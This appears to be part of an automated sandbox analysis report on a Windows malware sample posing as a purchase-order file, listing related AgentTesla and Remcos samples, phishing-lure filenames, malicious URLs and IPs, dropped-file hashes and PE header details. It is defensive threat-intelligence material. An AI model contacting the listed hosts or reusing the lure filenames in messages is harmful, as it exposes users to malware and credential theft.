	TT Fizetesi Bizonylat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	107.154.156.233 104.26.13.205
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	107.154.156.233 104.26.13.205
	http://www.youkonew.anakembok.de/	Get hash	malicious	Unknown	Browse	107.154.156.233 104.26.13.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\XClient.exe	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse
	temp.exe	Get hash	malicious	AgentTesla	Browse
	Urgent PO.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Contract Invoice.exe	Get hash	malicious	AgentTesla	Browse
	rPO4555131028.exe	Get hash	malicious	AgentTesla	Browse
	z1PURCHASEORDER736353.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Swift 409452623.88 copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Scaaned_Products_Specificationssxlx..exe	Get hash	malicious	AgentTesla	Browse
	INQUIRY#46789-JUNE_product_materials.exe	Get hash	malicious	Remcos	Browse
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3191
Entropy (8bit):	5.329865815274249
Encrypted:	false
SSDEEP:	96:lOqiqxwCYqh3oPtI6eqzxJi0aymTqdqlq7qqjqwZ5D:0qiqxwCYqh3qtI6eqzxJi0atTqdqlq7P
MD5:	ED066A53880EFC740C61C7C28CA0DD1F
SHA1:	E8FDD558E86429D209CBBB629EDC7DD48EE7C28B
SHA-256:	04B02EDEE0AD8EB7EB6F3AC4778B5000FC5692DA0D851D4DAEB7601A9BF163DD
SHA-512:	300916FA0C242F73F855677AE908F3C7B3FC324AE879ED31D82147C7CB8B9A5506A2C33813051A02434FF70D8A9793CE892CCB08540067E4137D87474CBE1653
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.378656660173192
Encrypted:	false
SSDEEP:	48:YWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8S50Uyus:YLHxvCsIfA2KRHmOugg1s
MD5:	D0D4E2419675C8875FDF35D4E8262CBF
SHA1:	21BDDE222B6E4713D6EF5CD1EE56869F157D4F88
SHA-256:	4B65621EDA14B66413C3F3AA68F939921E02615ED778988716411A999EC64990
SHA-512:	793C6B1DE7117DFCC282E38DE144673DA0C995B29E6C85DDE4303077DB90D23D743BEEEEA627EFCF7FCB661AC73BF83E9D449538E8656EC97304F9C14EEB6A60
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kdycl4x.gyb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vslwxn4.tve.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5l5cwsev.riv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4gs5tl3.mvt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqgmusst.sis.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgcljf1h.32e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dro2pzgd.zq3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f03rtvxo.sef.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpqpry5b.024.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fptbb4c1.qni.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gauihwey.vpt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lras4445.x1v.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lth5c3ww.wmk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvbkso1g.s5y.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0ahqv2e.cbq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wv3ohq5u.4id.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe, Detection: malicious, Browse Filename: temp.exe, Detection: malicious, Browse Filename: Urgent PO.exe, Detection: malicious, Browse Filename: Contract Invoice.exe, Detection: malicious, Browse Filename: rPO4555131028.exe, Detection: malicious, Browse Filename: z1PURCHASEORDER736353.exe, Detection: malicious, Browse Filename: Swift 409452623.88 copy.exe, Detection: malicious, Browse Filename: Scaaned_Products_Specificationssxlx..exe, Detection: malicious, Browse Filename: INQUIRY#46789-JUNE_product_materials.exe, Detection: malicious, Browse Filename: NEW ORDER.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe

Download File

Process:	C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2270208
Entropy (8bit):	6.8427384135048595
Encrypted:	false
SSDEEP:	49152:eF50a6aPVOFMx3SmroCZscivbS6mqxEWoKmqZJffp3vSsqPUCeaw1GANOmJA:croA7P/YJ
MD5:	31CBB0AD4FBFF526978C68212A36FB90
SHA1:	D5CBDD8F03037A73DD40C0819498C969AE5B9102
SHA-256:	1669D57E8C83D0666C86FAFCD484A5FD158C995A58AD9A6855C56D849C00B40B
SHA-512:	3F8E80AA86D486EACF4336B6A0A8F9C997DE33A7AE1DA5A1637E99FC168E0C4C8C1A9324B3C9BB69CE74D3529A881931234F45764D8F46810D820FB5629414A5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..Ec...c...c....v..j....v..n....v..M...j.D.m...(...h...c...n....w..k....w..b...c...b....w..$...pq..b...pq..b...Richc...................PE..d...2.}f.........."....(......................@..............................(......]#...`.........................................`.#.X.....#......@&..!....%..6...........p(......f!.T....................h!.(....d!.@............................................text............................... ..`.managed............................ ..`hydrated@................................rdata.............................@..@.data...h.....$......*..............@....pdata...6....%..8...D..............@..@.rsrc....!...@&.."...\| .............@..@.reloc.......p(.......".............@..B........................................................................................................................................................

C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.8427384135048595
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	ORDERDATASHEET#PO8738763.scr.exe
File size:	2'270'208 bytes
MD5:	31cbb0ad4fbff526978c68212a36fb90
SHA1:	d5cbdd8f03037a73dd40c0819498c969ae5b9102
SHA256:	1669d57e8c83d0666c86fafcd484a5fd158c995a58ad9a6855c56d849c00b40b
SHA512:	3f8e80aa86d486eacf4336b6a0a8f9c997de33a7ae1da5a1637e99fc168e0c4c8c1a9324b3c9bb69ce74d3529a881931234f45764d8f46810d820fb5629414a5
SSDEEP:	49152:eF50a6aPVOFMx3SmroCZscivbS6mqxEWoKmqZJffp3vSsqPUCeaw1GANOmJA:croA7P/YJ
TLSH:	22B5AD54E39801A8D877D634CA329333E771795A4B30D54F0A59EB0A2F73B929B3B712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..Ec...c...c....v..j....v..n....v..M...j.D.m...(...h...c...n....w..k....w..b...c...b....w..$...pq..b...pq..b...Richc..........

File Icon


Icon Hash:	2eec8e8cb683b9b1

Static PE Info

General

Entrypoint:	0x14006b3dc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x667DA332 [Thu Jun 27 17:36:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	97f00b2383bd4369e5094078fdccae7a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9AE8FBA120h
dec eax
add esp, 28h
jmp 00007F9AE8FB9967h
int3
int3
jmp 00007F9AE8FBA49Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F9AE8FB9B02h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F9AE8FB9B05h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F9AE8FB9AFDh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F9AE8FB9B12h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [001D73A9h]
jne 00007F9AE8FB9B02h
dec eax
rol ecx, 10h
test cx, FFFFh
jne 00007F9AE8FB9AF3h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x23ec60	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23ecb8	0x104	.rdata
